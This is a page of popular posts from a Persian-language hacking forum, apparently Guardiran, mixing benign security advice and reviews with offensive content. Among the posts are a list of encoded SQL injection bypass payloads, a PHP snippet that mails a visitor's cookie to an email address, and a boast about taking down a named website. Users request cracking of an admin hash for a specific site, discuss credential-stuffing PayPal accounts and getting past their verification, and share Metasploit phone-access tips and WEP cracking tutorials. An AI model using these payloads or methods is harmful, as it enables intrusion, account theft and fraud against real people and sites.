discord icon
سرور دیسکورد گاردایران

پرچمداران

  1. MR.MSA

    MR.MSA

    عضو تیم دیفیس


    • امتیاز

      12

    • تعداد ارسال ها

      440


  2. mownten

    mownten

    کاربر انجمن


    • امتیاز

      10

    • تعداد ارسال ها

      314


  3. Pir_wizard

    Pir_wizard

    کاربر تازه وارد


    • امتیاز

      9

    • تعداد ارسال ها

      44


  4. s9py

    s9py

    کاربر انجمن


    • امتیاز

      6

    • تعداد ارسال ها

      108



مطالب محبوب

در حال نمایش مطالب دارای بیشترین امتیاز در سه شنبه, 4 آذر 1399 در همه بخش ها

  1. 2 امتیاز
    دومین سایت : time.org | Link Check-host : https://check-host.net/check-report/e30c269k603 بقیه رو وقتی داون شد قرار میدم 😁
  2. 2 امتیاز
    با سلام . دوست عزیز اول اینکه شما هنوز حتی مطمئن هم نیستید که گوشیتون رو هک کردن فقط احتمالات فهمیدن نوع گوشی چیز خاصی نیست که بخاطرش بگید سیستمو هک کردن یا مثلا دسترسی به عکس ها ایا اون تونست ثابت کنه که به عکس هات دسترسی داره ؟ حالا سوالاتت ‌:‌ ۱- ببینید احتمالش کمه که ویندوز رو عوض کرده باشین اما باز هم دسترسی داشته باشه ولی نمیشه گفت ۱۰۰ درصد . ۲- چرا امکانش هست اگه به سیستم شما دسترسی داشته باشه ولی بازم نمیشه گفت ۱۰۰ درصد دسترسی گرفته ممکن اون موقع اصلا انلاین نبود مگر اینکه یه سیستم خودکار رو کانفیگ کرده باشه . ۳- ۹۰ درصد مواقع بله اما بعضی مواقع ممکنه نوع دسترسی و نوع ویروس و چیزی که روی سیستمتون ریخته بتونه حتی با فرمت کردن هارد بازم دسترسی باشه . ۴- خیلی لازم نیست اما کلا بهتره هر ماه پسورد وای فای تغییر کنه . ۵- بله در صورتی که خودش به وای فای وصل باشه (ممکن هم هست که از طریق سیستم شما بتونه دسترسی بگیره و لازم به اینکه خودش وصل باشه نباشه ) اما بازم نمیشه گفت ۱۰۰ دصد دسترسی میتونه بگیره این مورد بسته به نوع دسترسی که به سیستم شما داره مربوط میشه . ۶- احتمالش هست که قبلا دسترسی داشته باشه ولی خودتون میگید توی این چند سال چیز مشکوکی نبوده پس به احتمال زیاد دسترسی دیگه ندارن. ======================================== از نظر من که هنوز دسترسی نداره اما خیلی از افراد هک میشن اما خودشون خبر ندارن و اگه مورد مشکوکی تا به حال دیدید مثلا پاک شدن فایل هاتون یا اینجور چیز ها احتمال دسترسی داشتن شخص هنوز وجود داره دوست عزیز و برای امنیت بهتره از فایروال و انتی ویروس استفاده کنید . موفق و پیروز باشید . (لایک فراموش نشه )
  3. 2 امتیاز
    بله و اینکه توجه داشته باشید برای تشکر لازم نیست یک پست جدید بزارید یک لایک کفایت میکنه و پست یه جورایی اسپم به حساب میاد و میتونید از دکمه کنار تاپیک برای تشکر ، لایک و.. اقدام کنید . با احترام . انشاالله شما رو در کنار خودمون داشته باشیم منتظر فعالیت و پست های شما هستیم. موفق و پیروز باشید دوست عزیز .
  4. 1 امتیاز
    MR.MSA

    دوستان قدیمی

    من از بچه های قدیمی نیستم ولی برای ارتباط با @proxy @Mr.Python @C0d3!Nj3ct!0n @R3dC0d3r @RT3N @0r0b4s تشریف بیارید سرور دیسکورد انجمن
  5. 1 امتیاز
    crackerpassword

    اکانت شودان

    کرکر پسورد بهترین یوزر نیمی هست که وجود داره
  6. 1 امتیاز
    crackerpassword

    اکانت شودان

    شما با یوزر نیم من چیکار دارین یوزر نیمم دوست دارم این باشه
  7. 1 امتیاز
    با سلام خدمت شما کاربر محترم guardiran برای بایپس کردن عدد در حمله sql injection روش های مختلف و نکات متفاوتی وجود داره که میتونم چند روش رو خدمتتون بگم روش اول :---------------------->>>>> UnION distinctrow Select replace(0x2e312929556e495f7a656e4f6e2053656c5f7a656e65637420312c322c332c342c352c362c372c382c392c31302c31312c31322c31332c31342c31352c31362c313723,(0x5f7a656e),'')-- - روش دوم میتونید به صورت اعداد باینری وارد کنید --------------------------->>>>>>>>>>> UnION distinctrow Select 0b0010111000110001001010010010100101010101011011100100100101001111011011100010000001010011011001010110110001100101011000110111010000100000001100010010110000110010001011000011001100101100001101000010110000110101001011000011011000101100001101110010110000111000001011000011100100101100001100010011000000101100001100010011000100101100001100010011001000101100001100010011001100101100001100010011010000101100001100010011010100101100001100010011011000101100001100010011011100100011-- - روش سوم ---------->>>>>>>>>>>>>> ORDER BY (99999)-- روش چهارم ------------------>>>>>>>>>>> UNION SELECT (1),(2),(3),(4),(5)......-- روش پنجم ------------------>>>>>>>>>>>> union--+&uid=*/%0aselect 1&uid=2&uid=3&uid=4&uid=5&uid=6&uid=7&uid=8&uid=9&uid=10&uid=11&uid=12&uid=13&uid=14&uid=15&uid=16&uid=17&uid=18&uid='web.config'&uid=20&uid=21-- روش ششم ------------->>>>>>>>>>>>> UnION distinctrow Select replace(0x2e312929556e495f7a656e4f6e2053656c5f7a656e65637420312c322c332c342c352c362c372c382c392c31302c31312c31322c31332c31342c31352c31362c313723,(0x5f7a656e),'')-- - روش هفتم ------------------>>>>>>>>>>>> union select * from (select 1)a join(select 2)b join(select 3)c......-- روش های متفاوتی هست امیدوارم مفید واقع شده باشه برای آموزش های بیشتر به دیسکورد guardiran مراجعه فرمایید با تشکر Mr_Zero
  8. 1 امتیاز
    با تشکر از کد خوبتون من با اجازتون برنامتون رو setup کردم و اینجا قرار دادم بازم ممنون رمز فایل : guardiran.org Debug.rar
  9. 1 امتیاز
    سلام به دوستان برای تبدیل متغیر به دستور باید به متغیر رشته ای که حاوی دستورمون باشه بسازیم مثل متغیر زیر: vl1 = "print('mmj') " خب برای تبدیل دستور باید از تابع exec استفاده کنیم، و بهش ارگومانی که باید بدیم متغیر یا دستورست، اینجوری : exec(vl1) به همین راحتی!!! نتیجه mmj خب شاید در ساخت ویروس به کارتون بیاد
  10. 1 امتیاز
    nonamee

    کرک کردن هش

    سلام دوست عزیز وقت بخیر شما اگر از سیستم ویندوزی استفاده میکنید میتونید از این دوسایت قدرتمند استفاده کنید Hashkiller.io crackstation.net
  11. 1 امتیاز
    تو تمام سایت ها امکان قرار دادن کد های مخرب وجود داره ، که با توجه به نوع تارگت و سیستمش و زیر بخش های مختلف سیستمی اون ، کد های مخرب میتونن تاثیر گذار یا بی ثمر باشن ، این نوع دسته بندی کردن بر اساس نام دامین و غیره اصولی نیست
  12. 1 امتیاز
    ممنون از پاسخ گویی اما درباره بخش دامنه fsociety سوالم اطلاعی دارید؟
  13. 1 امتیاز
    سلام و خسته نباشید خدمت همه دوستان میخواستم بدونم این اتفاق برای شما هم افتاده یا نه من چند وقت پیش درخواست فراموشی رمز ایسنتا رو دادم یکم طول کشید و بین این وقت یک بار هم درخواست ریسند کد یا دوباره ارسال کردن کد روز زدم و برام کد 6 رقمی از فیس بوک اومد و پنج ثانیه بد برام یک کد از طرف یک شماره ایرانسل اومد. اولین پیام همون کد با پیام مخصوصی که اینستا با اسم فیس بوک برای کاربراش میفرسته بود اما پیامی که از خط ایرانسل برام اومد همون کد رو بدون هیچ متن اضافه ای فرستاد و کد هم درست بود . میخواستم بدونم الان من هک شدم ؟ مبایلم یا سیمکارتم یا پیجم یا حتی کامپیوترم چون این درخواست فراموشی رمز رو با کامپیوتر دادم. میخواستم بدونم اینستا از طریق ایرانسل هم کد میفرسته ؟؟؟ و اینکه به فرض که سیمکارتم هک شده باشه اگه سیمکارت و عوض کنم ( خط رو نسوزونم و فقط خود سیمکارت رو عوض کنم) درست میشه یا نه خیلی گیج شدم این چند وقت لطفا همه دوستان کمک کنند اگه اطلاع دارند از این موضوعات خیلی ممنون از انجمن خوبتون.
  14. 1 امتیاز
    MR.MSA

    برسی مرورگرها

    با سلام خدمت دوستان عزیز در این تاپیک قصد دارم که مرورگر ها رو باهم برسی کنیم . این روز ها شاید بعضی هکر ها بین چند مرورگر اختلاف نظر داشته باشند برای همین باهم اینجا این ها رو برسی میکنیم . ما می خواهیم مرورگرهای کروم ، فایرفاکس ،‌ تور و اپرا رو برسی کنیم که جز قوی ترین مرورگر ها هستند و بین ما هکر ها محبوبیت دارد ، خب بریم برسی رو شروع کنیم . اولین مرورگر یعنی Google Chrome ‌: همانطور که می دانید کروم متعلق به شرکت گوگل هست و گوگل یک موتور جستوجو قوی هست و بیشتر هکر ها از google استفاده می کنند به خاطر دورک ، امنیت ، سرعت و.... گوگل كروم به عنوان يكی از پركاربردترين مرورگرها در سراسر جهان شناخته می‌شود و بین خیلی ها محبوبیت دارد . از جمله ویژگی های کروم می توانیم اشاره کنیم به : سازگاری خوب با گوگل و نسخه های مختلف سرعت خوب و سازگاری با سیستم عامل های Windows، macOS، Linux، Android، iOS افزونه های بسیار زیاد و نرم افزار های افزودنی که داره جذابش می کنه (اما بعضی افزونه ها خوب کار نمی کند ) توضیحات : Chrome 79 به هیچ وجه مرورگر بدی نیست و پشتیبانی و همگام سازی متقابل پلتفرم ، ویژگی های خودکار کامل و برخی ابزار های خوب عالی برای توسعه دهندگان وب است . این می تواند به شما هشدار دهد اگر ایمیل شما به خطر بیفتد، از جستجوی DNS مطمئن برای ارائه دهندگان سازگار برخوردار است (خود DNS عمومی Google یکی از آنهاست) و بسیاری از محتوای مخلوط خطرناک مانند اسکریپت ها و تصاویر را در اتصالات غیرقابل اطمینان مسدود می کند. همچنین WebXR API را برای AR و VR فعال می کند. و .... نکات مثبت مرورگر کروم : حالت تاریک Chrome یک نکته مثبت است که می توانم بهش اشاره کنم . گوگل کروم به طور مداوم در لیست امن ترین مرورگرها قرار دارد و همانطور که گفتم و خبر دارید امنیت بسیار بالایی دارد. در تست های هک عملکرد خوبی دارد و بروزرسانی های مداوم و ماهیانه ای که داره شما رو بروز قرار می دهد. در مسابقات سالانه هک کردن Pwn2Own در چندین نوبت (و همچنین جوایز امنیتی دیگر) بخش “امن ترین مرورگر” را به دست آورد. نکات بدی که داره : عمده موارد مربوط به حریم خصوصی ، برنامه های افزودنی مرورگر می تواند باعث ایجاد مشکلات امنیتی و ... شود . میرویم سراغ مرورگر دوم یعنی Firefox : مرورگر فایر فاکس یک مرورگر محبوب در سرار جهان است که بیشتر خود ما ایرانی ها از این مرورگر استفاده می کند ، من هکر های زیادی رو تا به حال دیدم که از فایرفاکس استفاده می کنند ، فایرفاکس رقیب کروم هست و توی امنیت خیلی خوب خودش رو ثابت کرده است . از جمله ویژگی ها می توانیم اشاره کنیم به سرعت بالا مرورگر افزونه ها و ابزار های افزودنی افزونه های مورد استفاده در هک مثل hackbar و live http header (در کروم هم موجود هستند) نسخه های مختلف مرورگر ، برای توسعه دهندگان وب و درميان توسعه‌هندگان فايرفاكس احتمالا محبوب‌ترين مرورگر جهان است. با استفاده از این مرورگر میتوانید به یک خطایاب جاوا اسکریپت دست پیدا کنید. به علاوه ، با نسخه توسعه دهنده فايرفاكس ، شما به موتور CSS نسل بعد (نوشته شده در RUST) دسترسی پيدا خواهيد كرد ، يک سيستم CSS غيرفعال كه اعلان‌هايی كه بر روی صفحه اثر ندارد را غيرفعال می‌كند، و مواردی بيش از اين هم ارائه می‌كند. همچنين یک هاست “Firefox DevTool” برای دسترسی بهتر وجود دارد . پیشنهاد می کنم که اگر از مرورگر فایرفاکس یا کروم استفاده می کنید برای امنیت بالاتر در مرورگر خود از افزونه LastPass برای ذخیره پسورد ها تون استفاده کنید . سعی کردم بیشتر توضیحات رو بدم و امیدوارم لذت برده باشید . شاد باشید 😅
  15. 1 امتیاز
    وظیفه اجرای بک اسکریپت یا یک دستور در زمان مشخص شده رو بر عهده داره. موضوع کمیابی نیست با جستجو در گوگل میتونید نتایج و جیزییات بیشتری رو پیدا کنید.
  16. 1 امتیاز
    ممنونم. فقط اگه صفحه ای که کاربر توش هست بجای html و همون کد قدم دوم فقط با php نوشته شده باشه و کدش هم این باشه، کوکیش در اون صفحه به ایمیل 123@gmail.com ارسال میشه؟ <?php $cookie = $_GET['cookie']; mail( '123@gmail.com', 'Hello!', "$cookie." );
  17. 1 امتیاز
    jackhacker

    کرک کردن هش

    باز هم تشکر که وقت گذاشتید ولی متاسفانه درست عمل نکرد میخواهید برید سایت http://www.ftc.com.sa/admin با یوزر admin خودتون تست کنید.
  18. 1 امتیاز
    armanbabaei

    کرک کردن هش

    بله میشه
  19. 1 امتیاز
    shahroukh

    کرک کردن هش

    پسوردهای هش شده رو اینجا بفرستید تا بررسی کنیم
  20. 1 امتیاز
    کالی رو روی ماشین مجازی نصب کردی؟
  21. 1 امتیاز
    سلام من وقتی که متاسپلویت برای هک اندروید باز میکنم erorr میده و دیگه نمی تونم باهاش کار کنم در ضمن وقتی هم که lhost.lportو payload رو set میکنم همش set میشه به غیر از payload
  22. 1 امتیاز
    سلام دوستان ی سوال درمورد چکر پی پال داشتم . وقتی ک اکانتای پی پال با سنتزی یا کرکر کرک میشه چجوری لوکیشین ان را بفهمیم یا چکری دارین ک بتونه اینکارو کنه
  23. 1 امتیاز
    از لوکیشن های vpn استفاده کن رایج ترین هاش:usa,german,uk
  24. 1 امتیاز
    مثلا ۱۰ کا پوروکسی داریم و ۱۰ کا کمبو میزنیم کرک ۵۰۰ تا اکانت پی پال میده موقع لاگ این ارور میده ک لوکیشین من باهاش یکی نیس و ی سوالی میپرسه یا وریفای داره مشکل منم رد کردن وریفای هست و برنامه برا چک کردن اکانت پیپال ک پروکسی ک میدیم اونم همراه جیمیل و رمز بدع ک بفهمیم اکانت برا کدوم کشوره
  25. 1 امتیاز
    اول ینکه برای دسترسی دوباره باید با استفاده از دستورات مجود فایل خودتونو به فایل های سیستمی انتقال بدید. دوم اینکه برای گالری مستقیم نمیشه...ولی میتونید از طریق فایل هاش و shell وارد عکس ها بشید برای دوربین جلو و عقب هم دستور هست شما بعد از دسترسی دستور help یا ? رو بزنید همه کار هایی که میتونید انجام بدید روی تارگت هست از post ها غافل شید خیلی دسترسی های خوبی میدن.
  26. 1 امتیاز
    biowulf

    metasploit

    ﺳﻼﻡ ﻣﻤﻨﻮﻥ ﺑﺎﺑﺖ ﺭاﻫﻨﻤﺎﻳﻲ ﻭﻟﻲ ﺑﺎﺯﻡ ﻧﺸﺪ ﻫﻢ ﺗﻮﻱ ﮔﻮﺷﻴﻢ اﻳﻦﺟﻮﺭﻱ ﻣﻴﺸﻪ ﻫﻢ ﻛﺎﻣﭙﻴﻮﺗﺮ , ﻧﻤﻴﺪﻭﻧﻢ اﺯ ﭼﻴﻪ ﻧﻪ ﻣﻴﺘﻮﻧﻢ ﭘﻴﻠﻮﺩ ﺑﺴﺎﺯﻡ ﭘﻪ ﻣﺘﺎﺳﭙﻠﻮﻳﺖ اﺟﺭا ﻛﻨﻢ ﻭﻟﻲ ﺑﻌﻀﻲ ﻭﻗﺘﺎ ﻫﺮﺩﻭﺗﺎ اﺟﺮا ﻣﻴﺸﻪ ﻣﺜﻼ ﺷﺎﻳﺪ ﻫﺮ ﭘﻮﻧﺰﺩﻩ ﺑﻴﺴﺖ ﺑﺎﺭ ﻳﺒﺎﺭ اﺟﺮا ﺑﺸﻪ , اﻳﻦ اﺭﻭﺭﻭ ﻳﻪ ﺻﻔﺤﻪ ﻫﺴﺘﺶ ﺁﺩﻡ ﻧﻤﻴﺘﻮﻧﻪ ﺳﺮﭺ ﻛﻨﻪ
  27. 1 امتیاز
    سلام دوستان🙂 تو کالی با ابزار Netcat وقتی دستور nc -vv -z ipaddress 20-25 رو وارد میکنم با این warning مواجه میشم. forward host lookup failed for nobody.invalid: unknow host nobody.invalid [ip address] 25 (?): no route to host و... ip address رو همون ipv4 address سیستم تارگت میزنم ولی گویا طبق warning ای که هست سیستم هدف رو نمیشناسه. مشکل از چی میتونه باشه؟
  28. 1 امتیاز
    ؟؟؟ ادرس ip قربانی یک ادرس همگانی یا public است که برای خود فرد در نظرگرفته شده پس برای فرد private(خصوصی ) بحساب میاید... درسته برای برقراری ارتباط با قربانی باید ip public ان را بدست بیاورید زیررا تمام افراد میتوانند وی را شناسایی کنند...(عمومی است) اما منظور از خصوصی(private) این که خود شما نمیتوانید از ip public طرف اگاهی پیدا کنید چونکه خصوصی است... اینم برای شما تعریف ساده راجع به ایپی ادرس یک مثال بزنم: من سیستم یک هستم و دوستم سیستم دو است... پس سیستم من برای برقرار ارتباط نیاز به نشانی دارد(ip) و سیستم دوست من نیز نیاز به نشانی مجزا دارد پس میفهمیم برای برقراری ارتباط نیازمند به دونشانی هستیم (ip addr) این نشانی یکی نیستند منظورم این نیست که کاملا متفاوت باشند منظور این است که بصورت مستقل تنظیم شده اند تا عمل مسیر یابی انجام شود پس اصلا خودت را در درگیر نکن فقط بدان ip وظیفه مسیردهی و مسیر یابی داده هارا برعهده دارد و در لایه سومosi کار میکند و ...
  29. 1 امتیاز
    سلام متشکرم از توضیح کامل و جامع شما. متوجه gateway و شبکه شدم و درک کردم ولی گویا قرار نیست بفهمم ip address چیه! همون طور که فرمودین 4 تا عدد هست که با dot از هم جدا شدن. توی فیلم های آموزشی هم وقتی آیپی وارد میکنن همینه. مشکل این نیست که درک نکنم ip یه سری رویه و قوانین برای برقراری ارتباط بین چند تا دیوایس هست مشکل اینه که نمیتونم درک کنم که این ip که برای هر سیستمی به صورت private وجود داره من با چه عنوان فیزیکی ای از سیستم میتونم استخراج کنم؟ مثلا برای فهمیدن پیکربندیش کافیه تو ترمینال بزنم ipconfig و ... اگه یک شی نیست یه سایت نیست یه عنصر فیزیکی نیست پس این ip address ای که توی آموزش ها وارد میکنن از کجا میاد؟ شرمنده من خیلی گیج میزنم!!!!😔😔
  30. 1 امتیاز
    یک قطعه یک عکس از محیط برنامه اپلود کن option هاش رو برات توضیح بدم...
  31. 1 امتیاز
    دامنه برای سیستم های شخصیvalid protocol است یا پروتکل private قربانی ... با وارد کردن عبارت ip address در گوگل توسط سیستم قربانی نشانه ولید طرف را پیدا کنید...
  32. 1 امتیاز
    سلام خدمت شما اولا باید یک موضوعی رو مطرح کنم و از اول برای توضیح دهم در واقع شما یک پروتکل یا اینترنت پروتکل public را وارد کرده اید که شاید اصلا عمل route انجام نشده باشد... که این بمعنای این است که هر شبکه یک سرور یا یک محیط مجزا تحت عنوان Nat دارد که این وظیفه خوانش و تبدیل اصول Public به private را برعهده دارد یعنی پروتکل مارا از عمومی به خصوصی تبدیل میکند و به ما انرا اختصاص میدهد... پس اولین شما ممکن است اشتباه وارد کردن پروتکل های یک دامین باشد... و اشتباه دیگر زمانی رخ میدهد که شما دستورات بالقوه ای در اپشن های برنامه سلکت یا انتخاب کرده باشید که یک اررور را بشما بصورت Rplay برمیگرداند منظور از ریپلی این است که هنگامی که یک اطلاعات در شبکه یافت شد یا نشد یک پیغام در شبکه بصورت اررور هایی به ما باز ارسال میشود که این به معنی است که یک ریپلی میتواند بصورت پکت های دوعددی دریافت شود یا حتی بیشتر این به شبکه برمیگردد ... پس میفهمیم که در واقع در واقعیت به اررور هایی نظیر اررور 500 اینترنال (نواقص سایت ) و اررور هایی که ما برای ما یک دسترسی را میبرند ... پس فهمیدیم که فایر جلو اعمال دستورات passive مارا میگیرد و مشکل از شما و اپلیکیشن نیست... اگر مفهوم نشده در هر مورد بپرسید توضیح میدم سعی کردم کوتاه و کلی بیان کنم البته مورد های دیگری نیز هستند
  33. 1 امتیاز
    با سلام دوست عزیز یک سری مودلهای دلینک با تی پی لینک میشد اما الان دیکه اون اکسپلویت کار نمیکنه چون لاقین مودمارو طوری کردن که تو ناتیفیکیت یوزر پس میخواد راسی با ابزار مدوسا هم خوب کرک میشه تو لینوکس بتز یه تستی بزن
  34. 1 امتیاز
    درود هک وایرلس با رمزگذاری WEP با روش Hirte Attack زمانی که وایرلس Access Point ندارد. (منظور از فاقد Access point زمانی هست که مثلآ وایرلس با Hotspot یا Virtual Access Point ساخته شده) حجم فشرده : 36mg ادامه پارت ها در پست بعد . . . BTT7.part1.rar BTT7.part2.rar BTT7.part3.rar
  35. 1 امتیاز
    درود قسمت سوم , آموزش هک وایرلس با رمزگذاری WEP به روش Chop Chop Attack زمانی که کلاینتی به Access Point متصل نیست . حجم فشرده : 8mg BTT3.part1.rar BTT3.part2.rar
  36. 1 امتیاز
    درود این قسمت نحوه هک وایرلس با رمزگذاری WEP با روش اینجکت ARP Packet Replay زمانی که کلاینتی بهش متصل نیست رو می بینید. حجم فشرده : 3.5mg BTT2.rar
  37. 1 امتیاز
    _RubicK_

    حواشی بازی pokemon go

    درود خب اینبار یک مطلب راجب pokemon go میزارم که جالبه بدونید -------------------------------------------- pokemon go یک بازی واقعیت افزوده نیست! Pokemon GO از همان روز‌های اول به عنوان یک بازی واقعیت افزوده معرفی شد. ولی واقعیت این است که این بازی موبایل، هیچ ربطی به واقعیت افزوده ندارد. با زومجی همراه باشید. این روز‌ها بدون هیچ اغراقی می‌توان Pokemon go را محبوب‌ترین محصول دنیای سرگرمی دانست؛ بازی موبایلی استودیو نیانتیک لبز که به استناد تحلیل‌گران، بیش از 75 میلیون بار دانلود شده و البته، روزی نیست که خبر یا مطلب جدیدی راجع به این بازی منتشر نشود. از روز اولی که «پوکمون گو» منتشر شد، همه از آن به عنوان یک بازی واقعیت افزوده یاد کردند و همین مساله هم یکی از دلایلی است که باعث شده این بازی تا این حد محبوب شود. البته در اینکه Pokemon GO بازی جذابی است و ایده بسیار خاصی دارد شکی نیست. ولی واقعیت این است که این روز‌ها فناوری‌های واقعیت مجازی و واقعیت افزوده محبوبیت فوق‌العاده‌ای دارند و از آنجایی که برای افراد زیای ناشناخته هستند، همه دوست دارند تا به نوعی آن‌ها و محصولات مرتبط‌شان را تجربه کنند. پس قطعا اگر یک بازیساز برچسب «واقعیت مجازی» یا «واقعیت افزوده» روی محصولش بزند، شانس فروش آن را تا حد زیادی بالا برده است. شاید به همین دلیل هم باشد که در نظرسنجی اخیر زومجی مبنی بر دلایل محبوبیت این بازی، گزینه «استفاده از قابلیت واقعیت افزوده و گره خوردن بازی با دنیای واقعی» توانست بیشترین رای را کسب کند. با این حال شاید جالب باشد که بدانید Pokemon GO در اصل یک بازی واقعیت افزوده نیست و اصلا ارتباطی هم با واقعیت افزوده ندارد. سانی دیلیون، نویسنده سایت بسیار معتبر VentureBeat، یکی از افرادی است که تحقیقات زیادی در مورد فناوری‌های واقعیت مجازی/افزوده انجام داده است و با دلایلی ثابت کرده که پوکمون گو هیچ ارتباطی با این فناوری‌ها ندارد. واقعیت افزوده، نیاز به دید کامپیوتری و همچنین نقشه‌برداری داینامیک از محیط اطراف دارد. شرکت‌های فعال در زمینه واقعیت افزوده مثل مجیک لیپ، مایکروسافت (با هدست هولولنز) و گوگل (با هدست تانگو)، در اصل در پی ساخت محصولی هستند که هم دید کامپیوتری را ارائه می‌دهد و هم می‌تواند محیط اطراف را شناسایی کرده و شبیه‌سازی کند. با این حال هیچ کدام از گوشی‌های فعلی، یک هدست واقعیت افزوده نیستند و در نتیجه این قابلیت را ندارند که بتوانند محیط اطراف خود را شناسایی کرده و در نتیجه امکان تعامل با آن را فراهم کنند. پس این سوال پیش می‌آید که از چه فناوری استفاده کرده است؟ در اصل، استودیو نیانتیک لبز برای خلق این بازی، از نقشه‌های گوگل و طول و عرض جغرافیایی ثابت استفاده کرده و پوکمون‌ها را در سراسر نقشه پخش کرده است. در حالی که اگر پوکمون گو یک بازی واقعیت افزوده بود، به دلیل درک درست این فناوری از اشیا محیطی، دیگر امکان پیدا کردن پوکمون‌ها در وسط یک میدان بیسبال یا روی یک گربه، فراهم نمی‌شد. معرفی کردن Pokemon GO به عنوان یک بازی واقعیت افزوده، شبیه به این است که ویدیو‌های 360 درجه موبایل را یک محصول واقعیت مجازی بدانیم. در اصل، هم Pokemon GO و هم ویدیو‌های 360 درجه، مبتدی‌ترین تصور از آن چیزی هستند که واقعیت مجازی و افزوده قدرت ارائه‌اش را دارد. برای مثال، اصلی‌ترین شکل واقعیت مجازی را می‌توان در فناوری کمپانی 8i دید که قادر است انسان‌ها را در یک دنیای ۳ بعدی واقعی شبیه‌سازی کند و برای مثال می‌توانید در نقش یک گلادیاتور در وسط یک کولوسئوم مبارزه کنید. با یک مقایسه ساده مشخص است که تجربه این‌چنینی اصلا قابل مقایسه با آنچه که مثلا هدست کاردبرد گوگل ارائه می‌دهد، قابل مقایسه نیست. در مورد واقعیت افزوده هم، در آینده نزدیک شاهد بازی‌هایی خواهیم بود که به لطف هدست‌هایی مثل هولولنز یا مجیک‌لیپ تجربه‌ای فوق‌العاده و نزدیک به آنچه که در تریلر‌ها و تبلیغات بازی Pokemon GO شاهد هستیم، ارائه خواهند کرد. اگر تبلیغات این بازی را تماشا و بازی را هم شخصا تجربه کرده باشید، متوجه شده‌اید که گیم‌پلی بازی هنوز فاصله خیلی زیادی از آنچه که در ویدیو‌ها نمایش داده می‌شود دارد. دلیل این امر هم این است که Pokemon GO در حال حاضر یک بازی واقعیت افزوده نیست و فقط مبتنی بر GPS عمل می‌کند. ولی دور از انتظار نیست که در آینده نزدیک و با عرضه هدست‌های واقعیت افزوده، واقعا بتوانیم گیم‌پلی‌ای مشابه با آنچه در تریلر‌های بازی تماشا کرده‌ایم، تجربه کنیم. منبع: zoomg.ir شاد باشید
  38. 1 امتیاز
    این باگ خِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِِیلی بَََََََََََََََََََََََََََََََََََََََََََََََََََََََََََََََََََََده
  39. 1 امتیاز
    آموزش؟ چیزی؟
  40. 1 امتیاز
    GHOST

    دیوار آتش Comodo

    همه انسان ها مشترکا از بعضی چیزها تنفر دارند . باختن ، آلودگی ، نبود امنیت و موارد دیگری که واقعا هیچ کسی نمیتواند بگوید من از آنها خوشم می آید . در دنیای کامپیوتر مورد سومی که عرض کردیم ، اهمیت فوق العاده زیادی دارد . مسلما شما هم دوست ندارید کسی به اطلاعات شما دسترسی پیدا کند و نهایت تلاشتان را میکنید تا مانع از رخ دادن چنین اتفاقاتی شوید . در این میان هرچه اطلاعات تان در مورد مباحث امنیتی در دنیای کامپیوتر بیشتر باشد ، سود بیشتر خواهید برد . چون هر چقدر هم که سیستم های نرم افزاری و سخت افزاری امنیتی به شما در جهت تامین امنیت کمک کنند ، باز هم امکان رخ دادن اشتباهات انسانی بالاست . در صورت بروز یک اشتباه نیز باعث میشوید که تمام روتین های امنیتی که توسط سیستم های امنیتی پیاده سازی کرده بودید ، دور زده شوند . پس توصیه اول ما طبق آنچه در گذشته نیز گفته بودیم اینست که اطلاعات خود را در مورد امنیت کامپیوتر بالاتر ببرید . از عامل انسانی که بگذریم ، به سیستم های نرم افزاری و سخت افزاری میرسیم . سیستم هایی که مسئول تامین امنیت ما با نهایت قدرت و تا حد امکان هستند . این نرم افزارها توسط شرکت های بزرگ امنیتی و بوسیله تیم برنامه نویسان بسیار حرفه ای آنها نوشته میشود که اغلب خودشان جزو دسته هکرها هستند و ید طولایی در زمینه شناسایی تهدیدها ، روش های مقابله با آنها و در نهایت نابود سازی شان دارند . ولی هر چقدر هم که تیم های سازنده نرم افزارهای امنیتی حرفه ای باشند ، حرفه ای تر از آنها هم پیدا میشود . بله درست است . هکرهایی که شبانه روز در حال تلاش برای تخریب و یا دور زدن سیستم های امنیتی پیاده سازی شده توسط شرکت های امنیتی هستند و اغلب هم برنده این بازی بی پایان میشوند . میتوان گفت که هکرها همیشه یک گام از شرکت های امنیتی جلوتر هستند و این شرکت ها نمیتوانند امنیت 100 % را برای ما بوجود بیاورند . به هر حال باید تا جایی که امکان دارد در حفظ امنیت خود تلاش کنیم . شما هم مطمئنا از آنتی ویروس ها استفاده میکنید . برخی از نسخه ها فقط آنتی ویروس را در اختیار شما قرار میدهند اما برخی دیگر دارای مجموعه ی کاملی از ابزارهای امنیتی هستند . مثل بسته هایی که معمولا با نام Internet Security شناخته میشوند . البته میتوانند نام های دیگری هم داشته باشند . مثل محصول شرکت ESET که با نام Smart Security شناخته میشود . حالا کاری به این بحث ها نداریم . اگر شما هم جزو افرادی هستید که تنها از نرم افزار آنتی ویروس استفاده میکنید و از کاربران بسته های امنیتی کامل نیستید ، به شما پیشنهاد میکنیم با ما همراه باشید . چون میخواهیم نرم افزاری را به شما معرفی کنیم که میتواند در کنار آنتی ویروس شما ، امنیت را دو چندان کند . با گویا آی تی همراه باشید ……….. امروز قصد معرفی فایروال قدرتمند و رایگان شرکت کومودو را داریم . اگر نمیدانید فایروال چیست ، به شما پیشنهاد میکنیم این مطلب را از وبسایت نگهبان مطالعه کنید . حالا که با فایروال و روش کار آن آشنا شدید ، بهتر است به معرفی نرم افزار بسیار محبوب ، قدرتمند و البته رایگان شرکت معتبر کومودو بپردازیم . ابتدا این فایروال را از وبسایت کومودو دریافت کرده و نصب کنید . در هنگام دانلود دقت داشته باشید تا نسخه متناسب با ویندوزتان را انتخاب کنید . نسخه ای که شما دانلود و نصب کرده اید ( در زمان نوشته شدن این مطلب ) نسخه ی 5.8 است . پس از نصب و راه اندازی شدن این نرم افزار با تصویری مشابه زیر روبرو خواهید شد . بهتر است از همین جا شروع کنیم . اما قبل از شروع بهتر است واژه ای که به وفور در این مطلب از آن استفاده میشود را توضیح دهیم . واژه “سیاست” به مجموعه ای از قوانین اشاره دارد که توسط شما یا کومودو تعریف خواهد شد و یا از قبل تعریف شده اند . قوانین نیز مجموعه از پارامترها و تنظیمات هستند . اولین چیزی که در صفحه اصلی برنامه جلب توجه میکند ، سپر سبز رنگ است . همین کافیست تا شما متوجه شوید که وضعیت برنامه در حالت نرمال قرار دارد و مشکلی نیست . اگر این سپر زرد یا قرمز شد ، مشکلی بوجود آمده است . در زیر همین سپر ، اطلاعاتی در مورد مشکل بوجود آمده به شما داده میشود . سپس با قسمت سربرگ ها مواجه خواهید شد . اولین سربرگ Summary است که خلاصه ای از وضعیت برنامه را به 